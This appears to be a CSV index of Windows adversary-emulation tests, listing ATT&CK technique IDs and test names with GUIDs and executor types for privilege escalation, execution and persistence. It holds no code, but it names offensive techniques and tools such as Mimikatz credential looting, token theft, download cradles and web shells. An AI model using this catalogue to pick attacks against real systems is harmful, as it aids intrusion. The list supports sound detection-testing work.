privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
privilege-escalation,T1546.009,Event Triggered Execution: AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell
privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,3,Launch NSudo Executable,7be1bc0f-d8e5-4345-9333-f5f67d742cb9,powershell
privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,4,Bad Potato,9c6d799b-c111-4749-a42f-ec2f8cb51448,powershell
privilege-escalation,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription - CommandLineEventConsumer,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell
privilege-escalation,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,2,Persistence via WMI Event Subscription - ActiveScriptEventConsumer,fecd0dfd-fb55-45fa-a10b-6250272d0832,powershell
privilege-escalation,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,3,Windows MOFComp.exe Load MOF File,29786d7e-8916-4de6-9c55-be7b093b2706,powershell
privilege-escalation,T1134.004,Access Token Manipulation: Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
privilege-escalation,T1134.004,Access Token Manipulation: Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
privilege-escalation,T1134.004,Access Token Manipulation: Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
privilege-escalation,T1134.004,Access Token Manipulation: Parent PID Spoofing,4,Parent PID Spoofing - Spawn from svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell
privilege-escalation,T1134.004,Access Token Manipulation: Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell
privilege-escalation,T1546.001,Event Triggered Execution: Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,2,Reg Key RunOnce,554cbd88-cde1-4b56-8168-0be552eed9eb,command_prompt
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,3,PowerShell Registry RunOnce,eb44f842-0457-4ddc-9b92-c4caa144ac42,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,4,Suspicious vbs file run from startup Folder,2cb98256-625e-4da9-9d44-f2e5f90b8bd5,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,8,Add persistance via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,9,SystemBC Malware-as-a-Service Registry,9dc7767b-30c1-4cc4-b999-50cab5e27891,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,10,Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value,acfef903-7662-447e-a391-9c91c2f00f7b,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,11,Change Startup Folder - HKCU Modify User Shell Folders Startup Value,8834b65a-f808-4ece-ad7e-2acdf647aafa,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,12,HKCU - Policy Settings Explorer Run Key,a70faea1-e206-4f6f-8d9a-67379be8f6f1,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,13,HKLM - Policy Settings Explorer Run Key,b5c9a9bc-dda3-4ea0-b16a-add8e81ab75f,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,14,HKLM - Append Command to Winlogon Userinit KEY Value,f7fab6cc-8ece-4ca7-a0f1-30a22fccd374,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,15,HKLM - Modify default System Shell - Winlogon Shell KEY Value ,1d958c61-09c6-4d9e-b26b-4130314e520e,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,16,secedit used to create a Run key in the HKLM Hive,14fdc3f1-6fc3-4556-8d36-aa89d9d42d02,command_prompt
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,17,Modify BootExecute Value,befc2b40-d487-4a5a-8813-c11085fb5672,powershell
privilege-escalation,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
privilege-escalation,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
privilege-escalation,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
privilege-escalation,T1546,Event Triggered Execution,2,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
privilege-escalation,T1546,Event Triggered Execution,3,HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
privilege-escalation,T1546,Event Triggered Execution,4,WMI Invoke-CimMethod Start Process,adae83d3-0df6-45e7-b2c3-575f91584577,powershell
privilege-escalation,T1134.005,Access Token Manipulation: SID-History Injection,1,Injection SID-History with mimikatz,6bef32e5-9456-4072-8f14-35566fb85401,command_prompt
privilege-escalation,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,3,COM Hijacking with RunDLL32 (Local Server Switch),123520cc-e998-471b-a920-bd28e3feafa0,powershell
privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,4,COM hijacking via TreatAs,33eacead-f117-4863-8eb0-5c6304fbfaa9,powershell
privilege-escalation,T1574.009,Hijack Execution Flow: Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
privilege-escalation,T1546.010,Event Triggered Execution: AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
privilege-escalation,T1546.002,Event Triggered Execution: Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
privilege-escalation,T1574.002,Hijack Execution Flow: DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
privilege-escalation,T1574.002,Hijack Execution Flow: DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
privilege-escalation,T1037.001,Boot or Logon Initialization Scripts: Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
privilege-escalation,T1547.008,Boot or Logon Autostart Execution: LSASS Driver,1,Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt,8ecef16d-d289-46b4-917b-0dba6dc81cf1,powershell
privilege-escalation,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
privilege-escalation,T1055.001,Process Injection: Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
privilege-escalation,T1055.001,Process Injection: Dynamic-link Library Injection,2,WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique,8b56f787-73d9-4f1d-87e8-d07e89cbc7f5,powershell
privilege-escalation,T1546.007,Event Triggered Execution: Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
execution,T1053.005,Scheduled Task/Job: Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
execution,T1053.005,Scheduled Task/Job: Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
execution,T1053.005,Scheduled Task/Job: Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
execution,T1053.005,Scheduled Task/Job: Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
execution,T1053.005,Scheduled Task/Job: Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
execution,T1053.005,Scheduled Task/Job: Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
execution,T1053.005,Scheduled Task/Job: Scheduled Task,7,Scheduled Task Executing Base64 Encoded Commands From Registry,e895677d-4f06-49ab-91b6-ae3742d0a2ba,command_prompt
execution,T1053.005,Scheduled Task/Job: Scheduled Task,8,Import XML Schedule Task with Hidden Attribute,cd925593-fbb4-486d-8def-16cbdf944bf4,powershell
execution,T1053.005,Scheduled Task/Job: Scheduled Task,9,PowerShell Modify A Scheduled Task,dda6fc7b-c9a6-4c18-b98d-95ec6542af6d,powershell
execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt
execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt
execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software,718aebaa-d0e0-471a-8241-c5afa69c7414,command_prompt
execution,T1047,Windows Management Instrumentation,4,WMI Reconnaissance List Remote Services,0fd48ef7-d890-4e93-a533-f7dedd5191d3,command_prompt
execution,T1047,Windows Management Instrumentation,5,WMI Execute Local Process,b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3,command_prompt
execution,T1047,Windows Management Instrumentation,6,WMI Execute Remote Process,9c8ef159-c666-472f-9874-90c8d60d136b,command_prompt
execution,T1047,Windows Management Instrumentation,7,Create a Process using WMI Query and an Encoded Command,7db7a7f9-9531-4840-9b30-46220135441c,command_prompt
execution,T1047,Windows Management Instrumentation,8,Create a Process using obfuscated Win32_Process,10447c83-fc38-462a-a936-5102363b1c43,powershell
execution,T1047,Windows Management Instrumentation,9,WMI Execute rundll32,00738d2a-4651-4d76-adf2-c43a41dfb243,powershell
execution,T1047,Windows Management Instrumentation,10,Application uninstall using WMIC,c510d25b-1667-467d-8331-a56d3e9bc4ff,command_prompt
execution,T1059.007,Command and Scripting Interpreter: JavaScript,1,JScript execution to gather local computer information via cscript,01d75adf-ca1b-4dd1-ac96-7c9550ad1035,command_prompt
execution,T1059.007,Command and Scripting Interpreter: JavaScript,2,JScript execution to gather local computer information via wscript,0709945e-4fec-4c49-9faf-c3c292a74484,command_prompt
execution,T1559.002,Inter-Process Communication: Dynamic Data Exchange,1,Execute Commands,f592ba2a-e9e8-4d62-a459-ef63abd819fd,manual
execution,T1559.002,Inter-Process Communication: Dynamic Data Exchange,2,Execute PowerShell script via Word DDE,47c21fb6-085e-4b0d-b4d2-26d72c3830b3,command_prompt
execution,T1559.002,Inter-Process Communication: Dynamic Data Exchange,3,DDEAUTO,cf91174c-4e74-414e-bec0-8d60a104d181,manual
execution,T1204.002,User Execution: Malicious File,1,OSTap Style Macro Execution,8bebc690-18c7-4549-bc98-210f7019efff,powershell
execution,T1204.002,User Execution: Malicious File,2,OSTap Payload Download,3f3af983-118a-4fa1-85d3-ba4daa739d80,command_prompt
execution,T1204.002,User Execution: Malicious File,3,Maldoc choice flags command execution,0330a5d2-a45a-4272-a9ee-e364411c4b18,powershell
execution,T1204.002,User Execution: Malicious File,4,OSTAP JS version,add560ef-20d6-4011-a937-2c340f930911,powershell
execution,T1204.002,User Execution: Malicious File,5,Office launching .bat file from AppData,9215ea92-1ded-41b7-9cd6-79f9a78397aa,powershell
execution,T1204.002,User Execution: Malicious File,6,Excel 4 Macro,4ea1fc97-8a46-4b4e-ba48-af43d2a98052,powershell
execution,T1204.002,User Execution: Malicious File,7,Headless Chrome code execution via VBA,a19ee671-ed98-4e9d-b19c-d1954a51585a,powershell
execution,T1204.002,User Execution: Malicious File,8,Potentially Unwanted Applications (PUA),02f35d62-9fdc-4a97-b899-a5d9a876d295,powershell
execution,T1204.002,User Execution: Malicious File,9,Office Generic Payload Download,5202ee05-c420-4148-bf5e-fd7f7d24850c,powershell
execution,T1204.002,User Execution: Malicious File,10,LNK Payload Download,581d7521-9c4b-420e-9695-2aec5241167f,powershell
execution,T1204.002,User Execution: Malicious File,11,Mirror Blast Emulation,24fd9719-7419-42dd-bce6-ab3463110b3c,powershell
execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt
execution,T1106,Native API,2,WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique,ce4e76e6-de70-4392-9efe-b281fc2b4087,powershell
execution,T1106,Native API,3,WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique,7ec5b74e-8289-4ff2-a162-b6f286a33abd,powershell
execution,T1106,Native API,4,WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique,e1f93a06-1649-4f07-89a8-f57279a7d60e,powershell
execution,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
execution,T1072,Software Deployment Tools,2,PDQ Deploy RAT,e447b83b-a698-4feb-bed1-a7aaf45c3443,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,3,Run Bloodhound from Memory using Download Cradle,bf8c1441-4674-4dab-8e4e-39d93d08f9b7,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,4,Obfuscation Tests,4297c41a-8168-4138-972d-01f3ee92c804,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,5,Mimikatz - Cradlecraft PsSendKeys,af1800cf-9f9d-4fd1-a709-14b1e6de020d,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,6,Invoke-AppPathBypass,06a220b6-7e29-4bd8-9d07-5b4d86742372,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,7,Powershell MsXml COM object - with prompt,388a7340-dbc1-4c9d-8e59-b75ad8c6d5da,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,8,Powershell XML requests,4396927f-e503-427b-b023-31049b9b09a6,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,9,Powershell invoke mshta.exe download,8a2ad40b-12c7-4b25-8521-2737b0a415af,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,10,Powershell Invoke-DownloadCradle,cc50fa2a-a4be-42af-a88f-e347ba0bf4d7,manual
execution,T1059.001,Command and Scripting Interpreter: PowerShell,11,PowerShell Fileless Script Execution,fa050f5e-bc75-4230-af73-b6fd7852cd73,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,12,PowerShell Downgrade Attack,9148e7c4-9356-420e-a416-e896e9c0f73e,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,13,NTFS Alternate Data Stream Access,8e5c5532-1181-4c1d-bb79-b3a9f5dbd680,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,14,PowerShell Session Creation and Use,7c1acec2-78fa-4305-a3e0-db2a54cddecd,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,15,ATHPowerShellCommandLineParameter -Command parameter variations,686a9785-f99b-41d4-90df-66ed515f81d7,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,16,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,17,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,18,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,19,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,20,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,21,PowerUp Invoke-AllChecks,1289f78d-22d2-4590-ac76-166737e1811b,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,22,Abuse Nslookup with DNS Records,999bff6d-dc15-44c9-9f5c-e1051bfc86e1,powershell
execution,T1559,Inter-Process Communication,1,Cobalt Strike Artifact Kit pipe,bd13b9fc-b758-496a-b81a-397462f82c72,command_prompt
execution,T1559,Inter-Process Communication,2,Cobalt Strike Lateral Movement (psexec_psh) pipe,830c8b6c-7a70-4f40-b975-8bbe74558acd,command_prompt
execution,T1559,Inter-Process Communication,3,Cobalt Strike SSH (postex_ssh) pipe,d1f72fa0-5bc2-4b4b-bd1e-43b6e8cfb2e6,command_prompt
execution,T1559,Inter-Process Communication,4,Cobalt Strike post-exploitation pipe (4.2 and later),7a48f482-246f-4aeb-9837-21c271ebf244,command_prompt
execution,T1559,Inter-Process Communication,5,Cobalt Strike post-exploitation pipe (before 4.2),8dbfc15c-527b-4ab0-a272-019f469d367f,command_prompt
execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt
execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,3,Suspicious Execution via Windows Command Shell,d0eb3597-a1b3-4d65-b33b-2cda8d397f20,command_prompt
execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,4,Simulate BlackByte Ransomware Print Bombing,6b2903ac-8f36-450d-9ad5-b220e8a2dcb9,powershell
execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,5,Command Prompt read contents from CMD file and execute,df81db1b-066c-4802-9bc8-b6d030c3ba8e,command_prompt
execution,T1059.005,Command and Scripting Interpreter: Visual Basic,1,Visual Basic script execution to gather local computer information,1620de42-160a-4fe5-bbaf-d3fef0181ce9,powershell
execution,T1059.005,Command and Scripting Interpreter: Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6-9c2f-633ac4f1eefa,powershell
execution,T1059.005,Command and Scripting Interpreter: Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell
execution,T1569.002,System Services: Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
execution,T1569.002,System Services: Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
execution,T1569.002,System Services: Service Execution,4,BlackCat pre-encryption cmds with Lateral Movement,31eb7828-97d7-4067-9c1e-c6feb85edc4b,powershell
execution,T1569.002,System Services: Service Execution,5,Use RemCom to execute a command on a remote host,a5d8cdeb-be90-43a9-8b26-cc618deac1e0,command_prompt
execution,T1569.002,System Services: Service Execution,6,Snake Malware Service Create,b8db787e-dbea-493c-96cb-9272296ddc49,command_prompt
execution,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,7,Scheduled Task Executing Base64 Encoded Commands From Registry,e895677d-4f06-49ab-91b6-ae3742d0a2ba,command_prompt
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,8,Import XML Schedule Task with Hidden Attribute,cd925593-fbb4-486d-8def-16cbdf944bf4,powershell
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,9,PowerShell Modify A Scheduled Task,dda6fc7b-c9a6-4c18-b98d-95ec6542af6d,powershell
persistence,T1546.013,Event Triggered Execution: PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
persistence,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
persistence,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
persistence,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
persistence,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
persistence,T1547.014,Active Setup,1,HKLM - Add atomic_test key to launch executable as part of user setup,deff4586-0517-49c2-981d-bbea24d48d71,powershell
persistence,T1547.014,Active Setup,2,HKLM - Add malicious StubPath value to existing Active Setup Entry,39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a,powershell
persistence,T1547.014,Active Setup,3,HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number,04d55cef-f283-40ba-ae2a-316bc3b5e78c,powershell
persistence,T1543.003,Create or Modify System Process: Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
persistence,T1543.003,Create or Modify System Process: Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
persistence,T1543.003,Create or Modify System Process: Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
persistence,T1543.003,Create or Modify System Process: Windows Service,4,TinyTurla backdoor service w64time,ef0581fd-528e-4662-87bc-4c2affb86940,command_prompt
persistence,T1543.003,Create or Modify System Process: Windows Service,5,Remote Service Installation CMD,fb4151a2-db33-4f8c-b7f8-78ea8790f961,command_prompt
persistence,T1137,Office Application Startup,1,Office Application Startup - Outlook as a C2,bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c,command_prompt
persistence,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
persistence,T1137.006,Office Application Startup: Add-ins,1,Code Executed Via Excel Add-in File (XLL),441b1a0f-a771-428a-8af0-e99e4698cda3,powershell
persistence,T1137.006,Office Application Startup: Add-ins,2,Persistent Code Execution Via Excel Add-in File (XLL),9c307886-9fef-41d5-b344-073a0f5b2f5f,powershell
persistence,T1137.006,Office Application Startup: Add-ins,3,Persistent Code Execution Via Word Add-in File (WLL),95408a99-4fa7-4cd6-a7ef-cb65f86351cf,powershell
persistence,T1137.006,Office Application Startup: Add-ins,4,Persistent Code Execution Via Excel VBA Add-in File (XLAM),082141ed-b048-4c86-99c7-2b8da5b5bf48,powershell
persistence,T1137.006,Office Application Startup: Add-ins,5,Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM),f89e58f9-2b49-423b-ac95-1f3e7cfd8277,powershell
persistence,T1505.002,Server Software Component: Transport Agent,1,Install MS Exchange Transport Agent Persistence,43e92449-ff60-46e9-83a3-1a38089df94d,powershell
persistence,T1556.002,Modify Authentication Process: Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
persistence,T1505.005,Server Software Component: Terminal Services DLL,1,Simulate Patching termsrv.dll,0b2eadeb-4a64-4449-9d43-3d999f4a317b,powershell
persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
persistence,T1176,Browser Extensions,5,Google Chrome Load Unpacked Extension With Command Line,7a714703-9f6b-461c-b06d-e6aeac650f27,powershell
persistence,T1546.011,Event Triggered Execution: Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
persistence,T1546.011,Event Triggered Execution: Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
persistence,T1546.011,Event Triggered Execution: Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell
persistence,T1547.010,Boot or Logon Autostart Execution: Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt
persistence,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt
persistence,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
persistence,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
persistence,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
persistence,T1505.003,Server Software Component: Web Shell,1,Web Shell Written to Disk,0a2ce662-1efa-496f-a472-2fe7b080db16,command_prompt
